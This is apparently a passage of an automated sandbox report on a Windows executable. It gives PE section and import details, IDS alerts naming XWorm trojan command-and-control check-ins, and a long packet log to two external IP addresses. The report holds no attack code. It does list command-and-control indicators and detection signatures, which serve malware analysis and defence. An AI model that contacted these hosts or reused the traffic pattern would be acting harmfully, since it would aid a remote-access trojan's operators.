IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17548	0x17600	4a4de4552a8a05cfea4c4ff1b4e9532e	False	0.5845901570855615	data	6.644459188479388	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x50f0	0x5200	9d8b011d99158eb44878bffbe94c4c0b	False	0.3601371951219512	data	4.9319202453236715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x37c4	0x1a00	45f752e15a14fca1b3ff2706b42091af	False	0.3167067307692308	data	3.8749828218454043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x1c6ec	0x1c800	f7f67e74808bd8e37d727b9023fabdcb	False	0.2743540981359649	data	4.804387241910113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0x1e2e	0x2000	fdaa21fac2a6fbee01e606c2b1b84ce7	False	0.4864501953125	data	4.81697133250145	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x233a0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.2554878048780488
RT_ICON	0x23a08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.3602150537634409
RT_ICON	0x23cf0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.39344262295081966
RT_ICON	0x23ed8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.4358108108108108
RT_ICON	0x24000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.4986673773987207
RT_ICON	0x24ea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.5888989169675091
RT_ICON	0x25750	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.548963133640553
RT_ICON	0x25e18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.40534682080924855
RT_ICON	0x26380	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.18236129184904767
RT_ICON	0x36ba8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.3425838450637695
RT_ICON	0x3add0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.3924273858921162
RT_ICON	0x3d378	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.49953095684803
RT_ICON	0x3e420	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.580327868852459
RT_ICON	0x3eda8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6906028368794326
RT_GROUP_ICON	0x3f210	0xca	data	Chinese	China	0.6089108910891089
RT_VERSION	0x3f2dc	0x2a8	data	Chinese	China	0.4602941176470588
RT_MANIFEST	0x3f584	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap

WININET.dll

InternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-19:25:10.860430	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49701	59.56.110.103	192.168.2.7
07/02/24-19:21:24.908027	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49701	7000	192.168.2.7	59.56.110.103
07/02/24-19:25:10.861342	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49701	7000	192.168.2.7	59.56.110.103
07/02/24-19:23:11.014576	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49701	7000	192.168.2.7	59.56.110.103
07/02/24-19:24:48.480603	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49701	59.56.110.103	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:21:07.091839075 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:07.096668959 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:07.096760988 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:07.130027056 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:07.134804010 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047209024 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047261953 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047297001 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047307968 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047343969 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047343969 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047348022 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047382116 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047389030 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047425032 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047431946 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047467947 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047494888 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047509909 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047616959 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047650099 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047657967 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047686100 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.047692060 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.047724962 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.052433968 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.052484035 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.052582026 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.052623034 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.284626961 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.284704924 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.284739017 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.284773111 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.284807920 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.284857035 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.284857035 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.284857035 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.284857035 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.284926891 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.284956932 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.284956932 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.284965038 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.285000086 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.285007000 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.285043001 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.285396099 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.285449982 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.285453081 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.285484076 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.285485983 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.285520077 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.285531998 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.285553932 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.285564899 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.285595894 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.286293983 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.286331892 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.286345005 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.286374092 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.286384106 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.286417007 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.286432028 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.286449909 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.286458969 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.286489964 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.287111044 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.287147045 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.287163019 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.287182093 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.287188053 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.287215948 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.287224054 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.287257910 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.377496958 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.377532959 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.377568007 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.377610922 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.377650976 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.522603989 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.522650003 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.522703886 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.522721052 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523201942 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523236990 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523257017 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523271084 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523288965 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523304939 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523319006 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523340940 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523348093 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523382902 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523401022 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523423910 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523896933 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523930073 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523951054 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.523964882 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.523973942 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.524010897 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.524019003 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.524053097 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.524065018 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.524101019 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.524102926 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.524147987 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.524713039 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.524765968 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.524902105 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.524935007 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.524949074 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.524976969 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.525044918 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.525094986 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.525196075 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.525230885 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.525243998 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.525273085 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.525681019 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.525713921 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.525737047 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.525748014 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.525805950 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.525855064 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:08.526001930 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:21:08.526051044 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:21:12.369244099 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:12.374228954 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:12.375041962 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:12.555515051 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:12.560466051 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:18.405559063 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:18.451350927 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:24.908026934 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:24.913109064 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:25.239106894 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:25.251718998 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:25.256757021 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:37.248673916 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:37.253637075 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:37.579106092 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:37.581741095 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:37.586499929 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:48.408865929 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:48.451528072 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:49.592675924 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:49.597676039 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:49.923222065 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:21:49.925056934 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:21:49.929840088 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:01.936230898 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:01.942306042 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:02.272283077 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:02.275707960 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:02.280525923 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:13.526135921 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:22:13.526206017 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:22:14.279934883 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:14.284923077 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:14.610127926 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:14.611660957 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:14.616693020 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:18.399045944 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:18.451576948 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:18.811208963 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:18.816230059 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:19.141590118 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:19.143176079 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:19.148042917 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:31.155392885 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:31.160295010 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:31.492727995 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:31.498728037 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:31.503551960 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:43.498914957 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:43.503895998 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:43.830312014 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:43.832710981 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:43.837500095 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:44.582777977 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:44.587605000 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:44.914001942 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:44.915582895 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:44.920960903 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:48.428494930 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:48.483201027 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:56.517488956 CEST	49700	881	192.168.2.7	91.208.240.157
Jul 2, 2024 19:22:56.522409916 CEST	881	49700	91.208.240.157	192.168.2.7
Jul 2, 2024 19:22:56.922808886 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:56.928459883 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:57.256305933 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:22:57.258774996 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:22:57.263572931 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:00.842760086 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:00.847913027 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:01.301975012 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:01.304338932 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:01.311928988 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:01.686532021 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:01.691389084 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:01.702322960 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:01.707118034 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:01.733445883 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:01.738379002 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:02.018934965 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:02.020246983 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:02.027419090 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:02.254447937 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:02.255919933 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:02.261595964 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:02.497845888 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:02.503144026 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:02.507953882 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:08.611064911 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:08.616569996 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:08.942352057 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:08.946899891 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:08.951750994 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:11.014575958 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:11.019619942 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:11.347960949 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:11.350441933 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:11.355262041 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:18.436980009 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:18.486814022 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:22.514760971 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:22.520595074 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:22.845993042 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:22.848952055 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:22.853737116 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:34.860963106 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:34.865866899 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:35.192121029 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:35.198065996 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:35.202848911 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:47.202284098 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:47.207838058 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:47.532839060 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:47.534765005 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:47.540164948 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:48.108588934 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:48.113837957 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:48.155503035 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:48.160295010 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:48.436232090 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:48.483181000 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:48.670794010 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:48.677608013 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:48.682471037 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:48.955590010 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:23:48.958981991 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:23:48.963840008 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:00.499178886 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:00.504049063 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:00.832663059 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:00.857225895 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:00.863181114 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:02.842993975 CEST	49701	7000	192.168.2.7	59.56.110.103
